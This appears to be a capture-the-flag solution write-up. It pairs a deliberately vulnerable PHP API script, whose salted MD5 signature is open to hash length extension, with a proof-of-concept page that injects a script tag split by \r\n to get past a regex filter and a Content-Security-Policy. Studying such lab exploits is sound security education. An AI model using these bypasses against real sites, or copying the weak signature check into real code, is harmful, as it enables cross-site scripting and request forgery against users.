Solution
-
if(md5($salt.$api_string) !== $sig){
can be bypassed with hash length extension attack (didn't do it, but the key length is12
.) -
Use custom header and body to trigger CSP bypass.
<?php | |
require_once 'config.php'; | |
if(!isset($_GET["q"]) || !isset($_GET["sig"])) { | |
die("?"); | |
} | |
$api_string = base64_decode($_GET["q"]); | |
$sig = $_GET["sig"]; | |
if(md5($salt.$api_string) !== $sig){ | |
die("??"); | |
} | |
//APIs Format : name(b64),p1(b64),p2(b64)|name(b64),p1(b64),p2(b64) ... | |
$apis = explode("|", $api_string); | |
foreach($apis as $s) { | |
$info = explode(",", $s); | |
if(count($info) != 3) | |
continue; | |
$n = base64_decode($info[0]); | |
$p1 = base64_decode($info[1]); | |
$p2 = base64_decode($info[2]); | |
if ($n === "header") { | |
if(strlen($p1) > 10) | |
continue; | |
if(strpos($p1.$p2, ":") !== false || strpos($p1.$p2, "-") !== false) //Don't trick... | |
continue; | |
header("$p1: $p2"); | |
} | |
elseif ($n === "cookie") { | |
setcookie($p1, $p2); | |
} | |
elseif ($n === "body") { | |
if(preg_match("/<.*>/", $p1)) | |
continue; | |
echo $p1; | |
echo "\n<br />\n"; | |
} | |
elseif ($n === "hello") { | |
echo "Hello, World!\n"; | |
} | |
} |
<?php | |
header("Content-Security-Policy: default-src 'self'; script-src 'none'; base-uri 'none';"); | |
// Try with your environment! | |
if($_GET['go']){ | |
// exploit (3) | |
// 1. f**k header | |
header("HTTP/1.0 123 Meh"); | |
// 2. use \r\n to bypass | |
$encoded_payload = "<script\r\n>alert(1);\r\n</script\r\n>"; | |
if(preg_match("/<.*>/", $encoded_payload)){ | |
die("blocked"); | |
} | |
echo $encoded_payload; | |
echo "\n<br />\n"; | |
exit; | |
} | |
?> | |
<a href="?go=go">go</a> | |
<hr> | |
<?php | |
highlight_file("csp.php"); | |
?> |